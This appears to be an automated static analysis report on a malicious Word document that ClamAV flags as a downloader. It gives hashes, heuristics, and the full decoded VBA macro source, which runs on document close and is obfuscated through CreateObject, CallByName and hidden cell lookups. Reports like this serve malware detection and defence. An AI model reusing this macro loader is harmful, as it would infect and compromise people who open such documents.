Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 c9185a9e9c273113…

MALICIOUS

Office (OOXML)

83.3 KB Created: 2021-01-29 10:24:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-02-09
MD5: 322e9656044ca59f10ab2faa5b78c4f4 SHA-1: 22d123f8d5f76eba38cdb54b29645b04ab870c97 SHA-256: c9185a9e9c2731130c999ec704dab0d13009de00f8a636894e4ee78e154f95aa
222 Risk Score

Heuristics 5

  • ClamAV: Doc.Downloader.Valyria-10033915-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-10033915-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set rs = CreateObject(UserForm1.p3 & UserForm1.oc)
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Set nw = CallByName(rs.Workbooks, UserForm1.ic & UserForm1.pw, 1, UserForm2.ComboBox1, , , , UserForm1.rf)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 6839 bytes
SHA-256: f796c2b7833f935b217784d1d57bdcc31db88119a15ae22e06aeb64453f38b66
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Public ln, fe, q8, kc, lx, rs, dlo, kt, ds6, ig, iy, bu, ij, fhn, i1, lk

Sub Document_Close()

b3u

End Sub

Sub b3u()

On Error Resume Next

UserForm2.ComboBox1.ListIndex = 5

Set rs = CreateObject(UserForm1.p3 & UserForm1.oc)

rs.DisplayAlerts = False

p4 = 1301

q0 = 0

Err.Number = 0

While p4 <> 0 And q0 < 32

Set nw = CallByName(rs.Workbooks, UserForm1.ic & UserForm1.pw, 1, UserForm2.ComboBox1, , , , UserForm1.rf)

p4 = Err.Number

q0 = q0 + 16

Wend

If p4 <> 0 Then

fpm = UserForm2.ComboBox3

ErrHandler:

e4 = CallByName(Application, UserForm1.ke & UserForm1.bn, 2)

If e4 <> False Then

Set tw = CreateObject(UserForm1.d0u & UserForm1.f9)

CallByName tw.Documents, UserForm1.ic & UserForm1.pw, 1, ActiveDocument.FullName, , True

CallByName tw, UserForm1.ih & UserForm1.cg, 1, Now + TimeSerial(0, 0, 2), UserForm1.a & UserForm1.ql & "b3u"

Else

a5 = UserForm2.ComboBox8

CallByName Application, UserForm1.ih & UserForm1.cg, 1, Now + TimeSerial(0, 0, 17), UserForm1.a & UserForm1.ql & "b3u"

End If

rs.Quit

Exit Sub

End If

Dim g8

Set g8 = rs.sheets(1)

mss = "'"

r8 = UserForm2.ComboBox28

lk = rs.sheets(5).Cells(1, 1)

If Len(lk) < 1 Then

If rs.ActiveWorkbook.Title <> "Google" Then

GoTo ErrHandler

Else

Exit Sub

End If

End If

jp = g8.Cells(94, 28).Value

l2 = g8.Cells(106, 10).Value

ig = g8.Cells(6, 39).Value

iy = rs.sheets(2).Cells(37, 27).Value

lx = rs.sheets(2).Cells(22, 2).Value

vpe = rs.sheets(2).Cells(14, 52).Value

vc = rs.sheets(1).Cells(101, 9).Value

fk = rs.sheets(3).Cells(54, 34).Value

kh = rs.sheets(2).Cells(139, 2).Value

zio = UserForm2.ComboBox14

x = g8.Cells(138, 35).Value

ij = rs.sheets(2).Cells(73, 8).Value

i2 = UserForm2.ComboBox20

dlo = g8.Cells(124, 7).Value

ds6 = rs.sheets(3).Cells(36, 1).Value

hm = rs.sheets(3).Cells(4, 18).Value

egj = rs.sheets(2).Cells(139, 50).Value

bu = g8.Cells(56, 4).Value

m19 = UserForm2.ComboBox16

zj = g8.Cells(7, 54).Value

ID = rs.sheets(2).Cells(146, 20).Value

ln = rs.sheets(3).Cells(27, 18).Value

ot = rs.sheets(3).Cells(69, 40).Value

k4 = rs.sheets(1).Cells(118, 55).Value

kt = rs.sheets(3).Cells(63, 12).Value

fe = rs.sheets(3).Cells(76, 27).Value

hp = rs.sheets(3).Cells(116, 41).Value

y5 = UserForm2.ComboBox5

k1v = rs.sheets(2).Cells(37, 1).Value

i1 = ""

Set Sh1 = rs.sheets(4)

q7 = 1

nr = UserForm2.ComboBox18

ch = True

yaf = UserForm2.ComboBox20

While ch

d2 = Sh1.Cells(q7, 1).Value

If Len(d2) < 1 Then

ch = False

Else

i1 = i1 & d2

End If

q7 = q7 + 1

Wend

mw = CallByName(rs, x, 2)

UserForm1.br.Value = vc & mw & ID

UserForm1.n6.Value = l2

g4 = UserForm2.ComboBox24

CallByName CreateObject(k1v), k4, 1, UserForm1.br, zj, UserForm1.n6

Set n = CreateObject(jp)

jo = UserForm2.ComboBox24

Set m8 = CallByName(n, vpe, 2)

Set km = CallByName(m8, hp, 1)

Set ds6 = CallByName(n, ds6, 2)

Set kc = n

UserForm5.ComboBox1 = "sh"

Set ln = CallByName(fhn, ln, 2)

kt = CallByName(ln, kt, 2)

UserForm1.hd.Value = ot & fk

UserForm3.ComboBox1 = kh

Z = UserForm2.ComboBox18

UserForm1.hd.Value = hm

UserForm4.ComboBox1 = UserForm3.ComboBox1

UserForm3.ComboBox1 = kt

n = gh

jr = UserForm2.ComboBox9

nw = m3

g8 = af

m8 = ol

km = al

ds6 = tn

sm = UserForm2.ComboBox28

ig = qr

iy = ys

fhn = h6

m4 = UserForm2.ComboBox24

ln = ob

a6e = UserForm2.ComboBox17

kc = ld

DoEvents

CallByName rs, egj, 1

rs = fz

jc = UserForm2.ComboBox22

End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{E7F992BE-EF11-484B-BF76-D6EADBCD8076}{B0430367-2CDD-444C-A287-F20B1CD9C619}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{33F60D31-7078-4C73-975E-D91F5FB37647}{889B7B8B-9B53-47D8-8986-97CFB55FF8B3}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 
 

 urv = UserForm2.Controls.Count - 1

cb = UserForm2.ComboBox24

 
 
 
 

 rg = ""
 For j2 = 1 To urv Step 2
 rg = rg & UserForm2.Controls.Item(j2)
 Next

 ComboBox1.AddItem "f8"
 ComboBox1.AddItem "zg"
 ComboBox1.AddItem "ei"
 ComboBox1.AddItem "ed"
 ComboBox1.AddItem "i3"
 ComboBox1.AddItem rg
 ComboBox1.AddItem "gz"
 
 

wfo = UserForm2.ComboBox11

 
 
 
 

xjs = UserForm2.ComboBox13

 
End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{50EA7CA5-8300-45C7-9FCA-2629CBC1A428}{6C41E9F5-811B-4196-AC53-C684CEAC0583}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.ln, ActiveDocument.dlo, VbMethod, 1, ActiveDocument.kt
 CallByName ActiveDocument.ln, ActiveDocument.fe, VbMethod, UserForm1.hd.Value
End Sub

 

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{50C8B40B-55F9-4282-882C-D57365823225}{CA98DDFD-370E-417E-B6EC-9A258FE0ADC0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.kc, ActiveDocument.lx, VbMethod, UserForm1.hd.Value, ActiveDocument.i1, ActiveDocument.lk
End Sub

 

Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{AA98CE11-9F9D-4ECA-8186-53A3BB29C65B}{14256426-AAC9-426A-8ADB-252A1946AD4A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 Set ActiveDocument.ig = CallByName(ActiveDocument.ds6, ActiveDocument.ig, VbGet)
 Set ActiveDocument.iy = CallByName(ActiveDocument.ig, ActiveDocument.iy, VbGet)
 Set ActiveDocument.fhn = CallByName(ActiveDocument.iy, ActiveDocument.bu, VbMethod, ActiveDocument.ij)
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 50688 bytes
SHA-256: 12f2377c5673f496b1725df4719bf6457de6cf9323bceb82b7c84ed1da240f1c
Detection
ClamAV: Doc.Downloader.Valyria-10033915-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.